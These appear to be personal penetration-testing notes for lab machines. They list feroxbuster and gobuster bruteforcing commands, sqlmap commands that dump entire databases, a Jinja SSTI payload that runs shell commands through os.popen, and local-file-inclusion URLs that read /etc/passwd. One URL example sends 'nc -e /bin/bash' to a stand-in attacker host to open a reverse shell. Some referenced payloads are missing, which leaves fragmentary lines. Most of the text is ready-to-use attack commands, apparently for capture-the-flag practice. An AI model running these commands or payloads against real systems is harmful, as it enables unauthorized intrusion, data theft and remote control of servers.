Directory Bruteforce
Perform directory bruteforce as such:
sudo feroxbuster -u http://10.10.10.84 -n -x php -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
Check what extensions webpage is using by accessing such file as index.php or index.html.
Set appropriate extension with -x flag.
When on Windows machine → Use lower case directory list.
When on IIS machine → Use IIS specific wordlist.
Subdomain Bruteforce
Perform Subdomain bruteforcing and add newly discovered subdomains to /etc/hosts:
gobuster vhost -u http://analytical.htb --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -o gobuster-vhost
SQLi
SQLmap
sqlmap -r admin-cronos-htb-login-req.txt --batch
I can dump the whol database:
sqlmap -r req.txt --dbs --batch --dump
Instead of dumping the entire database, I can also specify the dump using the commands below:
sqlmap -r req.txt -D main --tables --batch
sqlmap -r req.txt --dbs --batch -D main -t user --dump
Manual Testing
Example:
SSTI
Follow this list of payloads to attempt on advanced SSTI.
try injecting alert script and see if the web app is actually reading the script:
Now on the browser, it confirms SSTI vulnerability.
Trying with {{7*7}} = {{7*7}}
shows 49=49:
Using the command below, I can execute command id
:
Using the command below I can list files in current directory:
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
Using the command below, I can spawn a reverse shell as root:
LFI
http://10.10.10.84/browse.php?file=../../../../../../../etc/passwd
Examples
http://example.com/index.php?page=/etc/passwd&cmd=id
http://example.com/index.php?page=/var/log/apache/access.log&cmd=nc%20-e%20/bin/bash%20attacker.com%204444
http://example.com/index.php?page=php://input&cmd=cat%20/etc/passwd